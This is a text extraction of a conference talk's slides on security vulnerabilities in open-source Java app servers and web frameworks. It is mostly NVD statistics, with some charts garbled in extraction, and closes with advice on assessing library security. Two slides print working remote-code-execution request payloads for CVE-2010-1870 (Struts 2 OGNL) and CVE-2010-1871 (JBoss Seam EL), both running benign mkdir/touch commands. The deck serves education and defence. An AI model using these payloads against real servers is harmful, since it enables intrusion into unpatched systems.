Security Vulnerabilities in Open Source Java Libraries

Patrycja Wegrzynowicz CTO, Yonita, Inc.

About Me

• Programmer at heart • Researcher in mind • Speaker with passion • Entrepreneur by need

@yonlabs

Agenda

• Motivation and methodology • Security vulnerabilities

– Stats and examples – App and web servers – Web frameworks

• Approach to security – What to look for – Where to look at

Disclaimer

I do not aim at bashing OSS!

Hello World in cloud is involve 1 load balancer, 3

web server and 2 database server

DevOps_Borat, Twitter

Underneath

Application

Libraries

App & Web Servers

Databases

Operating Systems

Infrastructure

Underneath

Application

Libraries

App & Web Servers

Databases

Operating Systems

Infrastructure

Sources

• The National Vulnerability Database – NIST Computer Security Division – DHS National Cyber Security Division/US CERT – http://nvd.nist.gov/

• The Open Source Vulnerability Database – Open Security Foundation – http://www.osvdb.org/

• The Exploit Database – http://www.exploit-db.com/

Common Vulnerability Scoring System v2

Access Vector Local

Adjecent network

Remote

Access Complexity High

Medium

Low

Authentication Multiple instances

Single instance

None

Confidentiality None

Partial

Complete

Integrity None

Partial

Complete

Availability None

Partial

Complete

Common Weakness Enumeration

Vulnerability Types NVD to CWE Mapping

Authentication Issues

Credentials Management

Permissions, Privileges, and Access Control

Buffer Errors Cross-Site

Request Forgery (CSRF)

Cross-Site Scripting (XSS)

Cryptographic Issues Path Traversal Code Injection Format String

Vulnerability

Configuration Information Leak/Disclosure Input Validation Numeric Errors OS Command

Injections

Race Condition Resource

Management Errors

SQL Injection Link Following

Other Not in CWE Insufficient Information Design Error

App & Web Servers

App & Web Servers

Tomcat 33%

JBoss 26%

WebLogic 10%

Jetty 8%

GlassFish 8%

WebSphere 7% Other

8%

Survey by ZeroTurnaround

Number of Vulnerabilities OSS

100

7

20 14

20

Tomcat Jboss AS Jboss EAP GlassFish Jetty

Based on NVD

Number of Vulnerabilities OSS and Proprietrary

100

7 20 14 20

185 201

Tomcat Jboss AS Jboss EAP GlassFishJetty WebLogic WebSphere

Based on NVD

Number of Vulnerabilities OSS vs Proprietary

OSS (5 platforms)

29%

Proprietary (2 platforms)

71%

Based on NVD

Vulnerabilities by Year OSS

0

2

4

6

8

10

12

14

16

18

20

2000 01 02 03 04 05 06 07 08 09 10 11 12

TomcatJboss ASJboss EAPGlassFishJetty

Based on NVD

Vulnerabilities by Year OSS + Proprietary

05

101520253035404550

TomcatJboss ASJboss EAPGlassFishJettyWebLogicWebSphere

Based on NVD

Vulnerabilities by Year OSS

0

5

10

15

20

25

30

2000 01 02 03 04 05 06 07 08 09 10 11 12

JettyGlassFishJboss EAPJboss ASTomcat

Based on NVD

Vulnerabilities by Year OSS and Proprietary

0

10

20

30

40

50

60

70

80

90

2000 01 02 03 04 05 06 07 08 09 10 11 12

WebSphereWebLogicJettyGlassFishJboss EAPJboss ASTomcat

Based on NVD

Vulnerabilities Scoring

0 1 4 2

0 20 21

80

2

13 10

17 122 126

10

4

2 1 3

32 28

1 1 10 29

Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere

LOW [0,4) MEDIUM [4,7) HIGH [7,8] CRITICAL [8,9) WTF?! [9,10]

Based on NVD

Confidentiality Impact

36

0

6 7 8

51 71

62

6

13 6 12

112 99

2 1

0 1 0 22 32

0%10%20%30%40%50%60%70%80%90%

100%

None Partial Complete

Based on NVD

Integrity Impact

55 2

10 5 9 76 71

45

4

9 8

11 91

99

0 1

0 1 0 18 32

0%10%20%30%40%50%60%70%80%90%

100%

None Partial Complete

Based on NVD

Availability Impact

71

2 11

6

14 82 71

28

4

9

5

6

83 99

1 1

0 3

0 20 32

0%10%20%30%40%50%60%70%80%90%

100%

None Partial Complete

Based on NVD

Vulnerability Types by Server

0%20%40%60%80%

100%

Authentication Issues Credentials Management Permissions, Privileges, and Access Control Buffer Errors CSRF XSS Cryptographic Issues Path Traversal Code Injection Configuration Information Leak Input Validation Numeric Errors Race Condition Resource Management Errors SQL Injection Link Following Design Error Unknown

Based on NVD

Top 3 Vulnerabilities

1 9

1

7 7 22

1

11 2

3 5

4 26 3

13 2

6 19 5 1

Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere

Credentials Management Permissions… CSRF XSSPath Traversal Information LeakInput Validation

Based on NVD

3 and More Vulnerabilities

7 4 9

7 7 22

4 11

3

5 4 26

10 8

3

3 13 6 19 3 5 14

12 8 3

Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere

Authentication Issues Credentials ManagementPermissions,...l CSRFXSS Cryptographic IssuesPath Traversal ConfigurationInformation Leak Input ValidationResource Management Errors Design Error

Based on NVD

Total Vulnerabilities by Type

0

10

20

30

40

50

60

Cros

s-Si

te S

crip

ting

(XSS

)Pe

rmiss

ions

, Priv

ilege

s,…

Info

rmat

ion

Leak

Inpu

t Val

idat

ion

Reso

urce

Man

agem

ent…

Desig

n Er

ror

Cryp

togr

aphi

c Is

sues

Path

Tra

vers

alAu

then

ticat

ion

Issu

esCr

eden

tials

Man

agem

ent

Cros

s-Si

te R

eque

st…

Conf

igur

atio

nBu

ffer E

rror

sCo

de In

ject

ion

Num

eric

Err

ors

Race

Con

ditio

nLi

nk F

ollo

win

gSQ

L In

ject

ion

WebSphereWebLogicJettyGlassFishJboss EAPJboss ASTomcat

Based on NVD

Max CVSS v2: 10 • CVE-2011-0807 • 20-04-2011 • Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server

2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration.

• AV: Network • AC: Low • Au: None required • C: Complete • I: Complete • A: Complete • Insufficient information

Min CVSS v2: 1.2 • CVE-2010-3718 • 2/10/11 • Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running

within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.

• AV: Local access • AC: High • Au: None required • C: None • I: Partial • A: None • Design Error

Web Frameworks

Vulnerabilities Selected Frameworks

0

2

4

6

8

10

12

14

16

Vulnerabilities

Struts2Jboss SeamGWT

Apache Struts 2 (latest release 2.3.4.1)

CVE-2010-1870 exploit (Struts2)

• Found by and exploit shown by Meder Kydyraliev

• Based on his previous bug: XW-641 – ('\u0023' + 'session[\'user\']')(unused)=0wn3d – #session['user']=0wn3d – ActionContext.getContext().getSession().put(“user

”, “0wn3d”) – ParametersInterceptor blacklists # to prevent

tampering with server-side data

CVE-2010-1870: Struts 2 • 8/17/10 • The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0

through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the # protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability

• AV: Network • AC: Low • Au: None required • C: None • I: Partial • A: None • [Design Error (NVD-CWE-DesignError)]

CVE-2010-1870 exploit • Guards:

– xwork.MethodAccessor.denyMethodExecution – #_memberAccess.allowStaticAccess

• Exploit by Meder Kydyraliev – #_memberAccess[‘allowStaticMethodAccess’] = true – #foo = new java.lang.Boolean(“false”) – #context[‘xwork.MethodAccessor.denyMethodExecution’] = #foo – #rt = @java.lang.Runtime@getRuntime() – #rt.exec(“touch /tmp/dir”, null)

/HelloWorld.action?('\u0023_memberAccess [\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context

[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo') (\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023r

t\ ('mkdir\u0020/tmp/PWNED'\u002cnull)))=1

CVE-2010-1871: JBoss Seam • 08/05/2010 • JBoss Seam 2 (jboss-seam2), as used in JBoss

Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.

• 6.8 • (AV:N/AC:M/Au:N/C:P/I:P/A:P) • Input Validation

CVE-2010-1871 exploit

• Found by and exploit provided by Meder Kydyraliev

/seam-booking/home.seam?actionOutcome=/pwn.xht

ml?pwned%3d%23 {expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[19].invoke

(expressions.getClass().forName('java.lang.R untime').getDeclaredMethods()[7].invoke(null),

'mkdir /tmp/ PWNED')}

How to Assess the Security Level of a Library?

What to Look For?

Vulnerabilities and trend Complexity Culture

Complexity

Culture

The best indicator of the library’s future security is culture that places value on security and clear evidence of broad and rigorous security analysis.

Jeff Williams, CEO, Aspect Security

What to Look For? • Known security vulnerabilities in an OSS library and

trends • Library complexity, its design and its dependencies • Security in software development process of an OSS

library – Security during development

• Security built into the development process – Security during issue handling

• Clear and transparent issue handling • Undisclosed details until fixed • Security response team • Security bulletins • Releases and release notes containing security information

Where to Look At? • Vulnerability Databases

– Open Source Vulnerability Database – National Vulnerability Database – Exploit Database

• Vendor site – Development process – Issue tracker – Security bulletins – Release notes

• Dependency hell – Use support of a dependency management tool (e.g.

update reports in maven)

patrycja@yonita.com

@yonlabs